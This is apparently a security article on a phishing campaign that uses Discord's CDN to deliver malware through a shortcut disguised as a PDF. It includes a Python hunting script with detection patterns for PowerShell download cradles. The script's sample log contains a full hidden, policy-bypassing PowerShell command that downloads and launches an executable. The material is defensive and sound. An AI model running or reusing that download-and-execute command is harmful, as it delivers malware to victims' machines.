A new phishing campaign has been discovered using Discord’s Content Delivery Network (CDN) to host and deliver malicious payloads. The campaign was identified after a phishing email led an end user to download a zip file containing a Windows shortcut (.lnk) disguised as a PDF. Opening the shortcut ran a PowerShell command that fetched two files from Discord’s CDN, an executable and a PDF: the PDF gives the victim the document they expected to open, while the executable runs and compromises the system.
Attackers use Discord’s CDN because it gives them reliable, fast file hosting on a domain that carries Discord’s trusted reputation. The download arrives over HTTPS from a legitimate, widely allowed domain rather than from an attacker-registered one, so URL-reputation filters, domain allowlists and network-level blocks that would catch a throwaway domain do not trigger, and the payload reaches any environment where Discord traffic is permitted. In this campaign, the payload consisted of an executable named ByelongBound.exe and a PDF named FASF240110.pdf, both hosted on Discord’s servers.
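The delivery chain above (a shortcut launching a PowerShell download cradle that pulls files from Discord’s CDN) leaves a recognisable trace in process-creation telemetry. The script below is an added example, not code from the original report or from any tool it names: it runs a simple scoring rule over Sysmon-style process-creation records and flags PowerShell launched by explorer.exe (which is what a double-clicked .lnk produces) when its command line contains a download cradle, evasion flags, or a URL on a Discord CDN host. The log lines, the pipe-delimited record format, the attachment path IDs and the command line itself are constructed for the example; only the two payload file names come from the article.

```python
"""Hunt process-creation records for PowerShell download cradles that fetch
payloads from Discord's CDN.  All sample data below is constructed for this
example; the record format (ts|Image|ParentImage|CommandLine) is a stand-in
for Sysmon Event ID 1 fields, not a real export format."""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Discord-operated hosts that serve user-uploaded attachments.
DISCORD_CDN_HOSTS = {"cdn.discordapp.com", "media.discordapp.net"}

# Interpreters that a malicious .lnk typically launches.
LAUNCHER_RE = re.compile(r"(powershell|pwsh|cmd)\.exe$", re.IGNORECASE)
# Common PowerShell download cradles.
CRADLE_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|\bcurl\b|\bwget\b|"
    r"downloadfile|downloadstring|start-bitstransfer)", re.IGNORECASE)
# Flags used to hide the console and skip policy checks.
EVASION_RE = re.compile(
    r"(-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-e(p|xecutionpolicy)\s+bypass)",
    re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.IGNORECASE)


@dataclass
class Finding:
    ts: str
    score: int
    reasons: list
    urls: list


def is_discord_cdn_url(url: str) -> bool:
    """True when the URL's host is one of Discord's attachment CDN hosts."""
    host = (urlparse(url).hostname or "").lower()
    return host in DISCORD_CDN_HOSTS


def parse_line(line: str) -> dict:
    """Split a constructed 'ts|Image|ParentImage|CommandLine' record."""
    ts, image, parent, cmdline = line.split("|", 3)
    return {"ts": ts, "image": image, "parent": parent, "cmdline": cmdline}


def analyse(event: dict):
    """Score one process-creation event; return a Finding if it looks like a
    shortcut-driven download cradle, else None."""
    if not LAUNCHER_RE.search(event["image"]):
        return None                      # only interpreters are interesting
    cmd = event["cmdline"]
    reasons, score = [], 0
    discord_urls = [u for u in URL_RE.findall(cmd) if is_discord_cdn_url(u)]
    if discord_urls:                     # strongest signal for this campaign
        reasons.append("fetches from Discord CDN")
        score += 3
    if CRADLE_RE.search(cmd):
        reasons.append("download cradle in command line")
        score += 1
    if EVASION_RE.search(cmd):
        reasons.append("hidden window / policy bypass flags")
        score += 1
    if event["parent"].lower().endswith("explorer.exe"):
        reasons.append("spawned by explorer.exe (user opened a file)")
        score += 1
    # Threshold 3: a Discord CDN URL alone, or cradle + evasion + explorer
    # parent (the generic .lnk cradle pattern) is enough to raise a finding.
    if score < 3:
        return None
    return Finding(event["ts"], score, reasons, discord_urls)


def hunt(lines):
    """Run analyse() over raw records and return the findings."""
    results = []
    for line in lines:
        finding = analyse(parse_line(line))
        if finding:
            results.append(finding)
    return results


# Constructed sample telemetry: a logon, the malicious shortcut's PowerShell
# child, a benign scheduled script, and the legitimate Discord client.
SAMPLE_LOG = [
    r'2024-01-10T09:14:02Z|C:\Windows\explorer.exe|C:\Windows\System32\userinit.exe|explorer.exe',
    r'2024-01-10T09:15:30Z|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\explorer.exe|'
    r'powershell.exe -w hidden -ep bypass -c "iwr https://cdn.discordapp.com/attachments/111/222/ByelongBound.exe '
    r'-OutFile $env:TEMP\ByelongBound.exe; iwr https://cdn.discordapp.com/attachments/111/222/FASF240110.pdf '
    r'-OutFile $env:TEMP\FASF240110.pdf; start $env:TEMP\FASF240110.pdf; start $env:TEMP\ByelongBound.exe"',
    r'2024-01-10T09:20:11Z|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\svchost.exe|'
    r'powershell.exe -NoProfile -File C:\Scripts\backup.ps1',
    r'2024-01-10T09:22:45Z|C:\Program Files\Discord\Discord.exe|C:\Windows\explorer.exe|"C:\Program Files\Discord\Discord.exe"',
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f.ts} score={f.score} {', '.join(f.reasons)}")
        for u in f.urls:
            print("   ", u)
```

Only the second record is flagged: the benign `-NoProfile` script scores 1 and the Discord client itself is not an interpreter, so ordinary Discord use in a permitted environment produces no finding. In a real deployment the same logic maps directly onto a Sysmon Event ID 1 or EDR process-creation query; the scoring weights are a starting point to tune against your own baseline of PowerShell usage.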
In the reported incident, responders isolated the affected host from the network and recommended re-imaging it and rotating the passwords of all user and admin accounts that had been used on it, with the report advising that they be changed more than once. Isolation cuts off command-and-control and lateral movement, re-imaging is preferred over cleanup because the executable’s full behaviour on the host is not known, and credential rotation covers anything the malware may have harvested while it ran.
For organizations with no business use of Discord, blocking it at the proxy or DNS layer is suggested as a protective measure; to remove this delivery channel the block has to cover the CDN hosts that serve attachments, not just the client and website. Where Discord is permitted, downloads of executables and archives from its CDN should at least be logged and inspected. The continued abuse of trusted infrastructure like Discord’s CDN highlights the need for vigilance and updated security practices to mitigate the risk of such attacks.